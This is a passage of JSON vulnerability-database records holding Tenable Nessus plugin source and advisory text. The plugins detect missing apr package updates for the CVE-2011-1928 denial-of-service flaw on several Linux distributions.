value:\"http://www.nessus.org/u?0c0ec168\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apr, apr-debuginfo and / or apr-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"apr-1.3.9-3.el6_1.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"apr-debuginfo-1.3.9-3.el6_1.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"apr-devel-1.3.9-3.el6_1.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:10", "description": "The Apache Portable Runtime (APR) is a portability library used by the Apache HTTP Server and other projects. It provides a free library of C data structures and routines.\n\nThe fix for CVE-2011-0419 introduced an infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME matching flag was used. A remote attacker could possibly use this flaw to cause a denial of service on an application using the apr_fnmatch() function.\n(CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the 'Location' directive with wildcard URLs. The denial of service could have been triggered during normal operation; it did not specifically require a malicious HTTP request.\n\nThis update also addresses additional problems introduced by the rewrite of the apr_fnmatch() function, which was necessary to address the CVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain a backported patch to correct this issue. Applications using the apr library, such as httpd, must be restarted for this update to take effect.", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : apr on SL4.x, SL5.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20110531_APR_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61052);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-1928\");\n\n script_name(english:\"Scientific Linux Security Update : apr on SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C\ndata structures and routines.\n\nThe fix for CVE-2011-0419 introduced an infinite loop flaw in the\napr_fnmatch() function when the APR_FNM_PATHNAME matching flag was\nused. A remote attacker could possibly use this flaw to cause a denial\nof service on an application using the apr_fnmatch() function.\n(CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the 'Location'\ndirective with wildcard URLs. The denial of service could have been\ntriggered during normal operation; it did not specifically require a\nmalicious HTTP request.\n\nThis update also addresses additional problems introduced by the\nrewrite of the apr_fnmatch() function, which was necessary to address\nthe CVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain\na backported patch to correct this issue. Applications using the apr\nlibrary, such as httpd, must be restarted for this update to take\neffect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1106&L=scientific-linux-errata&T=0&P=1394\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2e70f9f8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"apr-0.9.4-26.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"apr-debuginfo-0.9.4-26.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"apr-devel-0.9.4-26.el4\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"apr-1.2.7-11.el5_6.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"apr-debuginfo-1.2.7-11.el5_6.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"apr-devel-1.2.7-11.el5_6.5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"apr-docs-1.2.7-11.el5_6.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:39:02", "description": "From Red Hat Security Advisory 2011:0844 :\n\nUpdated apr packages that fix one security issue are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having low security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the Apache HTTP Server and other projects. It provides a free library of C data structures and routines.\n\nThe fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME matching flag was used. A remote attacker could possibly use this flaw to cause a denial of service on an application using the apr_fnmatch() function. (CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the 'Location' directive with wildcard URLs. The denial of service could have been triggered during normal operation; it did not specifically require a malicious HTTP request.\n\nThis update also addresses additional problems introduced by the rewrite of the apr_fnmatch() function, which was necessary to address the CVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain a backported patch to correct this issue. Applications using the apr library, such as httpd, must be restarted for this update to take effect.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 / 5 / 6 : apr (ELSA-2011-0844)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:apr", "p-cpe:/a:oracle:linux:apr-devel", "p-cpe:/a:oracle:linux:apr-docs", "cpe:/o:oracle:linux:4", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2011-0844.NASL", "href": "https://www.tenable.com/plugins/nessus/68284", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:0844 and \n# Oracle Linux Security Advisory ELSA-2011-0844 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68284);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_bugtraq_id(47929);\n script_xref(name:\"RHSA\", value:\"2011:0844\");\n\n script_name(english:\"Oracle Linux 4 / 5 / 6 : apr (ELSA-2011-0844)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:0844 :\n\nUpdated apr packages that fix one security issue are now available for\nRed Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C\ndata structures and routines.\n\nThe fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\ninfinite loop flaw in the apr_fnmatch() function when the\nAPR_FNM_PATHNAME matching flag was used. A remote attacker could\npossibly use this flaw to cause a denial of service on an application\nusing the apr_fnmatch() function. (CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the 'Location'\ndirective with wildcard URLs. The denial of service could have been\ntriggered during normal operation; it did not specifically require a\nmalicious HTTP request.\n\nThis update also addresses additional problems introduced by the\nrewrite of the apr_fnmatch() function, which was necessary to address\nthe CVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain\na backported patch to correct this issue. Applications using the apr\nlibrary, such as httpd, must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-June/002168.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-May/002153.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-May/002157.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected apr packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apr-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"apr-0.9.4-26.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"apr-devel-0.9.4-26.el4\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"apr-1.2.7-11.el5_6.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"apr-devel-1.2.7-11.el5_6.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"apr-docs-1.2.7-11.el5_6.5\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"apr-1.3.9-3.el6_1.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"apr-devel-1.3.9-3.el6_1.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr / apr-devel / apr-docs\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:49", "description": "Updated apr packages that fix one security issue are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having low security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the Apache HTTP Server and other projects. It provides a free library of C data structures and routines.\n\nThe fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME matching flag was used. A remote attacker could possibly use this flaw to cause a denial of service on an application using the apr_fnmatch() function. (CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the 'Location' directive with wildcard URLs. The denial of service could have been triggered during normal operation; it did not specifically require a malicious HTTP request.\n\nThis update also addresses additional problems introduced by the rewrite of the apr_fnmatch() function, which was necessary to address the CVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain a backported patch to correct this issue. Applications using the apr library, such as httpd, must be restarted for this update to take effect.", "cvss3": {}, "published": "2011-06-02T00:00:00", "type": "nessus", "title": "CentOS 4 / 5 : apr (CESA-2011:0844)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:apr", "p-cpe:/a:centos:centos:apr-devel", "p-cpe:/a:centos:centos:apr-docs", "cpe:/o:centos:centos:4", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2011-0844.NASL", "href": "https://www.tenable.com/plugins/nessus/54938", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:0844 and \n# CentOS Errata and Security Advisory 2011:0844 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54938);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_bugtraq_id(47929);\n script_xref(name:\"RHSA\", value:\"2011:0844\");\n\n script_name(english:\"CentOS 4 / 5 : apr (CESA-2011:0844)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apr packages that fix one security issue are now available for\nRed Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C\ndata structures and routines.\n\nThe fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\ninfinite loop flaw in the apr_fnmatch() function when the\nAPR_FNM_PATHNAME matching flag was used. A remote attacker could\npossibly use this flaw to cause a denial of service on an application\nusing the apr_fnmatch() function. (CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the 'Location'\ndirective with wildcard URLs. The denial of service could have been\ntriggered during normal operation; it did not specifically require a\nmalicious HTTP request.\n\nThis update also addresses additional problems introduced by the\nrewrite of the apr_fnmatch() function, which was necessary to address\nthe CVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain\na backported patch to correct this issue. Applications using the apr\nlibrary, such as httpd, must be restarted for this update to take\neffect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-June/017607.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4bcd8433\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-June/017608.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7612f342\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-May/017593.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?539b3068\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-May/017594.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1ae2d348\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected apr packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apr-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"apr-0.9.4-26.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"apr-0.9.4-26.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"apr-devel-0.9.4-26.el4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"apr-devel-0.9.4-26.el4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"apr-1.2.7-11.el5_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"apr-devel-1.2.7-11.el5_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"apr-docs-1.2.7-11.el5_6.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr / apr-devel / apr-docs\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:09", "description": "Maksymilian Arciemowicz reported that a flaw in the fnmatch() implementation in the Apache Portable Runtime (APR) library could allow an attacker to cause a denial of service. This can be demonstrated in a remote denial of service attack against mod_autoindex in the Apache web server. (CVE-2011-0419)\n\nIs was discovered that the fix for CVE-2011-0419 introduced a different flaw in the fnmatch() implementation that could also result in a denial of service. (CVE-2011-1928).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2011-06-13T00:00:00", "type": "nessus", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 10.04 LTS / 10.10 / 11.04 : apache2, apr vulnerabilities (USN-1134-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapr0", "p-cpe:/a:canonical:ubuntu_linux:libapr1", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-1134-1.NASL", "href": "https://www.tenable.com/plugins/nessus/55095", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1134-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55095);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_bugtraq_id(47820, 47929);\n script_xref(name:\"USN\", value:\"1134-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 10.04 LTS / 10.10 / 11.04 : apache2, apr vulnerabilities (USN-1134-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Maksymilian Arciemowicz reported that a flaw in the fnmatch()\nimplementation in the Apache Portable Runtime (APR) library could\nallow an attacker to cause a denial of service. This can be\ndemonstrated in a remote denial of service attack against\nmod_autoindex in the Apache web server. (CVE-2011-0419)\n\nIs was discovered that the fix for CVE-2011-0419 introduced a\ndifferent flaw in the fnmatch() implementation that could also result\nin a denial of service. (CVE-2011-1928).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1134-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libapr0 and / or libapr1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n 